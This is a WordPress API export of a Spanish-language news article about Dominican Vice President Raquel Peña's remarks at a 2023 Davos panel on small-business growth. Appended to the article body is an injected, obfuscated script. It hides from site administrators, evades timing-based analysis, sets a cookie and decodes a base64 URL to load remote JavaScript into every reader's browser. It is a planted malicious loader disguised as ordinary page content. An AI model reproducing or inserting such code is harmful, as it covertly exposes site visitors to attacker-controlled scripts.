{"id":13454,"date":"2023-01-19T08:33:45","date_gmt":"2023-01-19T12:33:45","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13454"},"modified":"2023-01-19T08:33:45","modified_gmt":"2023-01-19T12:33:45","slug":"vicepresidenta-raquel-pena-participa-junto-a-jefes-de-estado-latinoamericanos-en-panel-liderazgo-para-america-latina","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13454","title":{"rendered":"Vicepresidenta Raquel Pe\u00f1a participa junto a jefes de Estado latinoamericanos en panel \u201cLiderazgo para Am\u00e9rica Latina\u201d"},"content":{"rendered":"<p>Davos, Suiza.-\u00a0<strong>La Vicepresidenta de la Rep\u00fablica, Raquel Pe\u00f1a,<\/strong>\u00a0particip\u00f3 en el\u00a0<strong>Panel \u201cLiderazgo para Am\u00e9rica Latina\u201d<\/strong>\u00a0junto a los mandatarios latinoamericanos\u00a0<strong>Gustavo Francisco Petro<\/strong>\u00a0<strong>Urrego<\/strong>, Presidente de Colombia;\u00a0<strong>Rodrigo Chaves Robles<\/strong>, Presidente de Costa Rica;\u00a0<strong>Guillermo Lasso Mendoza<\/strong>, Presidente de Ecuador, y\u00a0<strong>Fernando Haddad<\/strong>, Ministro de Finanzas de Brasil. Dicho evento fue realizado en el marco de la\u00a0<strong>Reuni\u00f3n Anual del Foro Econ\u00f3mico Mundial 2023.<\/strong><\/p>\n<p>Durante el panel, la vicepresidenta de la Rep\u00fablica explic\u00f3\u00a0<strong>c\u00f3mo los beneficios de la apertura comercial llegan hasta las empresas m\u00e1s peque\u00f1as,<\/strong>\u00a0as\u00ed como los pasos que ha dado el pa\u00eds y el Gobierno al respecto, mientras que el Presidente<strong>\u00a0de Ecuador, Guillermo Lasso Mendoza,<\/strong>\u00a0habl\u00f3 sobre c\u00f3mo ese pa\u00eds ha balanceado su\u00a0<strong>pol\u00edtica fiscal y la inversi\u00f3n social<\/strong>.<\/p>\n<p>De su lado,\u00a0<strong>el Presidente de Colombia, Gustavo Francisco Petro Urrego<\/strong>, mencion\u00f3 de manera detallada cu\u00e1les son los\u00a0<strong>motores para promover el crecimiento y una mayor productividad\u00a0<\/strong>y atraer m\u00e1s inversiones para su pa\u00eds, en tanto, el Presidente<strong>\u00a0de Costa Rica, Rodrigo Chaves Robles<\/strong>, explic\u00f3 cu\u00e1l es la postura de su pa\u00eds en materia de aumentar\u00a0<strong>la participaci\u00f3n en las cadenas de valor y dinamizar la integraci\u00f3n econ\u00f3mica de Am\u00e9rica Latina.<\/strong><\/p>\n<p>Al\u00a0 responder a la pregunta sobre c\u00f3mo se puede asegurar que los beneficios de la apertura comercial lleguen hasta los m\u00e1s peque\u00f1os, la Vicepresidenta de la Rep\u00fablica explic\u00f3 que\u00a0<strong>el Presidente Luis Abinader aplic\u00f3 una serie de\u00a0<\/strong><strong>estrategias puntuales enfrentando en primer lugar y de manera muy eficiente la pandemia<\/strong>, lo que permiti\u00f3 abrir inmediatamente la econom\u00eda y lograr que el 2022 cerrara con un crecimiento econ\u00f3mico\u00a0<strong>por encima del 5 %<\/strong>\u00a0ante situaciones muy adversas a escala mundial.<\/p>\n<p><em>\u201cDesde el Gobierno se han destinado montos muy importantes en cuanto al financiamiento blando de las micro, peque\u00f1as y medianas empresas, pero tambi\u00e9n en lo que corresponde a la formaci\u00f3n de los recursos humanos de esas empresas, la innovaci\u00f3n y la capacitaci\u00f3n para el fortalecimiento econ\u00f3mico, logrando que sean cada d\u00eda m\u00e1s competitivas\u201d,<\/em>\u00a0explic\u00f3 la vicemandataria.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/panel20Liderazgo20para20AmC3A9rica20Latina202.jpg\" alt=\"\" width=\"1024\" height=\"683\" data-entity-type=\"file\" data-entity-uuid=\"e87e2e04-a1dc-40b4-a8b0-ed66c722f1da\" \/><\/p>\n<p>Pe\u00f1a manifest\u00f3 que el\u00a0<strong>70 %<\/strong>\u00a0de las empresas en Am\u00e9rica Latina corresponde a las\u00a0<strong>mipymes<\/strong>\u00a0y en\u00a0<strong>Rep\u00fablica Dominicana representa el 98 %<\/strong>, por lo que el Presidente Luis Abinader le ha prestado\u00a0<strong>una atenci\u00f3n especial a ese sector\u00a0<\/strong>y se ha establecido un fortalecimiento de las existentes, adem\u00e1s de apoyo a los emprendedores para que sigan creando nuevas empresas.<\/p>\n<p>La funcionaria destac\u00f3 que para que las micro, peque\u00f1as y medianas empresas tuvieran acceso a mayores mercados,\u00a0<strong>el Presidente Luis Abinader instruy\u00f3 para que el Gobierno tomara en cuenta a las mipymes como suplidoras del Estad<\/strong>o, acci\u00f3n que ha aumentado significativamente el monto de venta de cada una de esas empresas.<\/p>\n<p><em>\u201cActualmente la mayor\u00eda de las zonas francas del pa\u00eds se est\u00e1n supliendo en materia prima de las mipymes; eso ha hecho que realmente nosotros podamos lograr un gran avance en ese sector\u201d<\/em>, precis\u00f3.<\/p>\n<p>Dijo que el Presidente Abinader fue de los primeros en tener claro el valor de las mipymes y que\u00a0<strong>seguir\u00e1 trabajando en la creaci\u00f3n de empleos.<\/strong><\/p>\n<p><em>\u201cNosotros, gracias a Dios, tenemos que mostrar que estamos muy bien posicionados en las mipymes. Ese sector se ha fortalecido y muchas de las micro, peque\u00f1as y medianas empresas est\u00e1n exportando sus productos\u201d,<\/em>\u00a0precis\u00f3.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Davos, Suiza.-\u00a0La Vicepresidenta de la Rep\u00fablica, Raquel Pe\u00f1a,\u00a0particip\u00f3 en el\u00a0Panel \u201cLiderazgo para Am\u00e9rica Latina\u201d\u00a0junto a los mandatarios latinoamericanos\u00a0Gustavo Francisco Petro\u00a0Urrego, Presidente de Colombia;\u00a0Rodrigo Chaves Robles, Presidente de Costa Rica;\u00a0Guillermo Lasso Mendoza, Presidente de Ecuador, y\u00a0Fernando Haddad, Ministro de Finanzas de Brasil. Dicho evento fue realizado en el marco de la\u00a0Reuni\u00f3n Anual del Foro Econ\u00f3mico Mundial [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13456,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13454","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13454","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13454"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13454\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13456"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13454"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13454"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13454"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}